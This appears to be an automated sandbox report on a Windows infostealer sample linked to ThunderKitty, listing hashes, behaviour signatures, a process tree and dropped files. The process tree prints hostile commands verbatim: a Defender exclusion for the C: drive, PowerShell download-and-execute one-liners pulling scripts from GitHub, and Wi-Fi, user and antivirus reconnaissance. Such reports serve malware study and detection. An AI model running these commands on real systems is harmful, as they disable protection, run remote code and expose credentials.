Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/08/2024, 02:29

General

  • Target

    2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    f3df756208598308ccc728d2a1651243

  • SHA1

    ce93f221b9fcaa9315bffcd8d28c434e69ed0c64

  • SHA256

    f072a76d02f68b5d50234d88a35f5c1c4df2549913e574aa17e7a22e9c7e577b

  • SHA512

    7719375c360a8d6ee99b844a55b61e312343f75df5145200618fbb3006604b44cc5d1275b4d0217c74934ea8db11b430c9d5b616232de4aa724f7a0718486946

  • SSDEEP

    196608:fsWQx346coeXYk8TmIhI0bQ+ko9gvK9aXFFT:f2x2oKZ8TmsI00+kzvfz

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB304.tmp" "c:\Users\Admin\AppData\Local\Temp\heqgxv2g\CSCE8DAB60AF0764C28A2F689E0DE1F9AE1.TMP"
          4⤵
            PID:1164
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:1692
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3636
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:2892
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:2740
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:4308
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4828
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:4236
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:4396
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3484
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:1976
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:3284
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:4908
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:3228
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:1016
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:3496
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:1148
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:1620
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2608
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3260
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1CB.tmp" "c:\Users\Admin\AppData\Local\Temp\bansvk1u\CSC4DDE922E5EE45DAA9BEC2D610A3F14A.TMP"
                          4⤵
                            PID:4380
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:2864
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1064
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:684
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:3928
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:3436
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2924
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x424 0x508
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:620

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          67b0a41134410b2b0ad5e01f6966ac1b

                          SHA1

                          fe54ad45f0ad2550513048e681ddfa2a47e25a8b

                          SHA256

                          d44434e0ea080223e4afa9ed4316cab5805e3d28221df9e8b7e2789a4518faa9

                          SHA512

                          efa1f52521bd420657ac5da046b355fc2717f372ebe2fceb4c6e70f26b5a7ec38895131f564b92def508036453669af22262b464c2abfabc664ef4594233e663

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          e2ffae1f09795d880e4d1050fb5e1194

                          SHA1

                          391a821a754b15654be7cf18347bac67f1bbc682

                          SHA256

                          b1e3a0e39734520d8c3b6afa8feeb4bf70890a653939f0727502e66c029f41cb

                          SHA512

                          7de2152fced393682299e5f4225b6d90e1e15aaaf4e80e749ea6f5567813532f77972652cfa855ced4ff084784d916caf71f4bdffb96662e884acd46302e5bec

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          51f710cd4139e4b540d5c19c7a8af98c

                          SHA1

                          b1ce30c9a65e4166a072f636fcec40bc0b34db3e

                          SHA256

                          5b7d514834452b67fe6d3b817c41044dfb7b788d363f465fa0b1a74def4fe82e

                          SHA512

                          c0606d6b653e9c7cbc8892fe3282d017c8f07182a58e9927c839495a2337c97a2e3080882bdeebc697ff5fb0f445d32dcb0e0c5867b66af4c8eadcb46a31667e

                        • C:\Users\Admin\AppData\Local\Temp\RESB1CB.tmp

                          Filesize

                          1KB

                          MD5

                          2a1e00db18d1798520867e5c8f8ba632

                          SHA1

                          846ffd8e24c7c935629e3019922fa8cf41020dae

                          SHA256

                          3246c286c393deeaa1db1adf27c645c1643b1dd05ed03b725321ca2f2898b01f

                          SHA512

                          a18b7791a62149261f0ded9ef1e7e300d6eb775639b6c663e05cbef40053e20f270e2fbcd4f19e17604c9e27f482236f83ef0d54464d63e43b096f75aec72a21

                        • C:\Users\Admin\AppData\Local\Temp\RESB304.tmp

                          Filesize

                          1KB

                          MD5

                          5f90fcdc25b0a9c204eeacff231866ca

                          SHA1

                          8627c23dcd49f2161a9ffb1f88b541caae338e39

                          SHA256

                          d65ea35fe4164d8dbe88d3339e3194e049bb0f699f5603292dec611bc0bc338a

                          SHA512

                          b594e54f532ee0aa7830d491d3060ed2f5034f65193079b7beb9a84fa6f0bef0541c4bd9c2005bb70a63a05c71ebe4d3fad6506a29eca7804c3eee1817617727

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          82KB

                          MD5

                          c68c2aa4623882e9a0c393f5baefd0c1

                          SHA1

                          b52b62cae4d49dedc8dc9a967421d6ddf5b26111

                          SHA256

                          3b359b80006601e7616c7df3a6b1247e4c6807d7b165230807ce1ab3df538dc9

                          SHA512

                          931ca17993bca1996a792a154463e39ec10e7f906ecd423c0d20b6c2774ce10c8e49b679b2752ec82eb6a7b2e5630d0f4fdaa535168d3b72e0555abd1c9ab3bf

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          23KB

                          MD5

                          bfe393b53ace43f563c39466b21a1ab5

                          SHA1

                          e8004b5bd39e0b7fce340f283c29a165ac2e42e5

                          SHA256

                          7eb29d56d7ef3b8b193d844072ddf7d64f59d63d4f481f74b4eef2a9542ff5f6

                          SHA512

                          bed84854d96bc6b2f45d2b93aa444132c53ad6dbe8b4c93939f2d7b3521649bef83d13fc9003c6ede2a5adb64b1ee4ff9c456af00032f477b993003981dfe14f

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgvh0mpq.v2i.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.dll

                          Filesize

                          4KB

                          MD5

                          e15ca2fccd3269e147a14c18f1ac3316

                          SHA1

                          607ab96aa19da8553f7185a06cdab0d31557a9c1

                          SHA256

                          2a39bfa49b51d5eebfdb3cc0d92ea61cdb351885f1ea6a84092edfc143772896

                          SHA512

                          7e04966c8db144d03a5375c24ca48fa605a8d384c99851a4a62a7e2bde8e7c64c191af6f4ba0e40bd132fca662d1b1688f47273390a799d02d0c6241b07e6a72

                        • C:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.dll

                          Filesize

                          4KB

                          MD5

                          c9c6ff9c4dee237fb944799a61a8eefd

                          SHA1

                          f4639673c116d0e27c1b70ed9fe46c3bf5e1d655

                          SHA256

                          2adc06191be6faff4fcd216da0a20740d8f10bbd33946b24ed611ff816b297f5

                          SHA512

                          58544c1ec4dac3e6ba7ad780c893e1871799d178fb6730ad7a8c433085364b34e086689915d0ca94f28cb9a61a5d31a5f207c06a11d059feaddce88a6bafd332

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\CSC4DDE922E5EE45DAA9BEC2D610A3F14A.TMP

                          Filesize

                          652B

                          MD5

                          e0c30a98b698fa6a81103f31088db97e

                          SHA1

                          62c9ccddab80400edbcbb84f01bf036181570534

                          SHA256

                          6a8e19d714b5d120c23a270377d164c1f97be913c485d4e9ad1e01c5429d2958

                          SHA512

                          ac650e4c3d64c52f77ae060946d3bfc19f4f2facb91bdfc8e39f1dd882dcd4966073afafd0bef92fee7ef285f9284a842910fd3de0efccec2cc6be8e20a3fe45

                        • \??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.cmdline

                          Filesize

                          369B

                          MD5

                          e0196ce34b46c3e9f4e5810824c774c3

                          SHA1

                          47236cde0f1deecd9bd79d2a0fd85960ced8c083

                          SHA256

                          527045298c51e1503648aab1508dce2ef4282d88ceb68e3129bb6e647ac73150

                          SHA512

                          071cdd3668f82f64baadd82a0a9c56fe384a5c9ca600b9007bc321fa571b9e79740b5402bde7dd7bde06c55b91ac9e5f15327b810dc3bf150f19b783d90d3c02

                        • \??\c:\Users\Admin\AppData\Local\Temp\heqgxv2g\CSCE8DAB60AF0764C28A2F689E0DE1F9AE1.TMP

                          Filesize

                          652B

                          MD5

                          7cf177595c7a433b2c488fac3f14ddb0

                          SHA1

                          0a319ad378b73f2b6d9c0a3a9c9d4a132ba4ef40

                          SHA256

                          13acdd0cf339c750c225fc36f03a435464eb1220e82f8048ecf9df90482c61b3

                          SHA512

                          114ade6242198ca1eaa31f9b06bb4d2292d2eabfc00ae9d5c79ca60a865a670f21d6e17a1ca7394b5e9ec49b2a74df04dcf39593eef6d3320b4d162de9167d67

                        • \??\c:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.cmdline

                          Filesize

                          369B

                          MD5

                          d7d9112d3781b67c23a22abd87ebdc1e

                          SHA1

                          e29138939ab2387ca690ce0d69a4beab169bfd39

                          SHA256

                          75beccbb0004583e54d2f933b6703321625b5660914536433ec06a34a2080fb4

                          SHA512

                          bdfe9ebbd8a9e0ef98e94f04df25d220049bb3060b60838021d87745ceb1d3e2e6ce25d49f27c214affd752f3ea27cc580a37a465eda0ff7fbe0a808f5d3265d

                        • memory/2608-46-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2608-42-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2608-23-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2608-75-0x000002AB30210000-0x000002AB30218000-memory.dmp

                          Filesize

                          32KB

                        • memory/2608-21-0x000002AB30220000-0x000002AB30242000-memory.dmp

                          Filesize

                          136KB

                        • memory/2608-97-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3316-65-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3316-0-0x00007FFDBC743000-0x00007FFDBC745000-memory.dmp

                          Filesize

                          8KB

                        • memory/3316-22-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3316-1-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3324-45-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3324-95-0x0000017C29BC0000-0x0000017C29BEA000-memory.dmp

                          Filesize

                          168KB

                        • memory/3324-96-0x0000017C29BC0000-0x0000017C29BE4000-memory.dmp

                          Filesize

                          144KB

                        • memory/3324-84-0x0000017C2A100000-0x0000017C2A8A6000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/3324-82-0x0000017C295A0000-0x0000017C295A8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3324-130-0x0000017C29BB0000-0x0000017C29BC2000-memory.dmp

                          Filesize

                          72KB

                        • memory/3324-131-0x0000017C29BA0000-0x0000017C29BAA000-memory.dmp

                          Filesize

                          40KB

                        • memory/3324-47-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3324-140-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3324-44-0x00007FFDBC740000-0x00007FFDBD201000-memory.dmp

                          Filesize

                          10.8MB